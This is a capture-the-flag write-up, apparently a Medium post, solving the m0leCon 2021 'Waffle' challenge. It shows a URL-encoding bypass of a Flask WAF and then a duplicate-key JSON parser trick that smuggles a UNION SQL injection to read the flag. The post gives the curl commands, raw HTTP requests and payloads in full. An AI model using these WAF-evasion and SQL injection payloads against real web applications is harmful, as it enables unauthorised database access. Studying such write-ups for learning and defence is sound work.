m0leCon CTF 2021 Teaser — Bypassing WAF

M0lecon CTF 2021 Challenges

Challenge: Waffle

  • 1 Go App (main.go) — Well.. The main App
  • 1 Python/Flask App (waf.py) — The WAF 😡
  • /search
  • /gettoken
  • / (static files)
Beginning of the searchWaffle function

The Free Token

gettoken function on the main App
  • Gets the parameters creditcard and promocode
  • If promocode is “FREEWAF”, just returns the token!

Meet the WAF

  • The catch_all function processes all the requests (except for /search below, which we’ll ignore for now).
  • If it is the /gettoken, gets the creditcard and promocode (just like the main app)
  • If the promocode if FREEWAF, it BLOCKS THE REQUEST, returning an HTTP 400.
  • If it is not the gettoken, just send it to the main app, without the parameters (else block).
$ curl localhost:1337/gettoken
{“err”:”Paramerer ‘creditcard’ is missing”}

$ curl localhost:1337/gettoken?creditcard=123\&promocode=FREEWAF
{“err”:”Sorry, this promo has expired”}

Round 1

$ python
Python 3.8.9 (default, Apr 3 2021, 01:00:00)
[GCC 7.5.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from urllib import parse
>>> gettoken_url = 'gettoken?promocode=FREEWAF&creditcard=yourcard'
>>> gettoken_url_bypass = parse.quote(gettoken_url)
>>> print(gettoken_url_bypass)
gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard
if promo == 'FREEWAF':
res = jsonify({'err':'Sorry, this promo has expired'})
res.status_code = 400
return res
r = requests.get(appHost+path, params={'promocode':promo,'creditcard':creditcard})
$ curl -v http://127.0.0.1:1337/gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard
* Trying 127.0.0.1:1337...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 1337 (#0)
> GET /gettoken%3Fpromocode%3DFREEWAF%26creditcard%3Dyourcard HTTP/1.1
> Host: 127.0.0.1:1337
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Set-Cookie: token=NEPTUNED
< Date: Sun, 30 May 2021 21:25:23 GMT
< Content-Length: 32
< Content-Type: text/plain; charset=utf-8
< Server: Werkzeug/1.0.1 Python/3.8.9
<
{"msg":"Take your free token!"}
* Closing connection 0

Searching the Flag

  • This is a POST endpoint, receiving JSON data.
  • It searches the waffle table by name, min and max radius, which are the parameters received in the JSON.
  • The JSON is parsed using github.com/buger/jsonparser package.
  • Concatenate string to build the complete SQL command.
  • Some very obvious SQL Injection vulnerabilities in the code.
  • Encode the result lines as JSON and send the result.
$ curl -X POST -d {} http://127.0.0.1:1337/search
{"err":"You need a valid token"}
$ curl --cookie 'token=NEPTUNED' -d '{"name": "x"}' -X POST http://127.0.0.1:1337/search
[]
$ curl --cookie 'token=NEPTUNED' -d '{"name": "Neptunian"}' -X POST http://127.0.0.1:1337/search
[{"name":"Neptunian","radius":10,"height":10,"img_url":"http://localhost/img.png"}]
  • Tested without the token. We knew the main app would block.
  • Tested with the token, using a random name parameter. No results.
  • Tested with the token, using a known name parameter. All the results for that name.
  • Parses the JSON result (j).
  • Checks if the value of the name parameter is an alphanumeric string.
  • Checks if the values of the min and max parameters are integer numbers.
  • Ignores any other parameters.
  • If some parameter fails this condition, blocks the request (HTTP 400).
  • If no problems are found, send the original request to the main app (keep it in mind).

Round 2

$ curl --cookie 'token=NEPTUNED' -d '{"name": "\"Neptunian"}' -X POST http://127.0.0.1:1337/search
{"err":"Bad request, filtered"}
$ nc 127.0.0.1 1337
POST /search HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Cookie: token=NEPTUNED
Content-Length: 33
{"name": "abc'", "name": "Hello"}
HTTP/1.0 500 INTERNAL SERVER ERROR
Date: Mon, 31 May 2021 00:07:28 GMT
Content-Length: 55
Content-Type: text/plain; charset=utf-8
Server: Werkzeug/1.0.1 Python/3.8.9
{"err":"DB error, something was wrong with the query"}

Capturing the Flag

SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'
SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'
UNION ALL SELECT 1, 2, 3, 4 from flag
WHERE ''='
'
SELECT name, radius, height, img_url FROM waffle
WHERE name = 'some_name'
UNION ALL SELECT flag, 2, 3, 'SQL Injected!' from flag
WHERE ''='
'
  • Get the token using the double-quote bypass (part 1)
  • Prepare the SQL Injection payload
  • Prepare the JSON data.
  • Send the payload, with the token cookie, using requests
$ python solve.py 
/gettoken Response: {“msg”:”Take your free token!”}
Token: NEPTUNED
“{\”name\”: \”abc’ UNION ALL SELECT flag, 1, 2, ‘SQL Injected!’ FROM flag WHERE ‘’=’\”, \”name\”: \”Hello\”}”
[{“name”:”CTF{FLAG_HERE}”,”radius”:1,”height”:2,”img_url”:”SQL Injected!”}]
$ python solve.py 
/gettoken Response: {“msg”:”Take your free token!”}
Token: LQuKU5ViVGk4fsytWt9C
“{\”n\\u0061me\”: \”abc’ UNION ALL SELECT flag, 1, 2, ‘SQL Injected!’ FROM flag WHERE ‘’=’\”, \”name\”: \”Hello\”}”
[{“name”:”ptm{n3ver_ev3r_tru5t_4_pars3r!}”,”radius”:1,”height”:2,”img_url”:”SQL Injected!”}]

References

--

--

--

Hacker tiozão do pavê de final de semana

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Easily visualize the correlation of your portfolio in Python

them with high amounts of oxygen with high flow rates.

Player Missiles part 2!

Digitizing Business Support: A Data Engineering Project

What Is Bug Triage And What Advantages Does It Have?

Ruby IV | Image Upload 🖼️

Quicksort Algorithm

The beginner’s guide to MongoDB

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neptunian

Neptunian

Hacker tiozão do pavê de final de semana

More from Medium

Exploring log4j RCE vulnerability (CVE-2021–44228)

Denial of Service(DOS) Attack

TryHackMe | Bandit Chap. 1 Official Writeup.

Deploying Seven (a Hack The Box Discord Bot for Teams)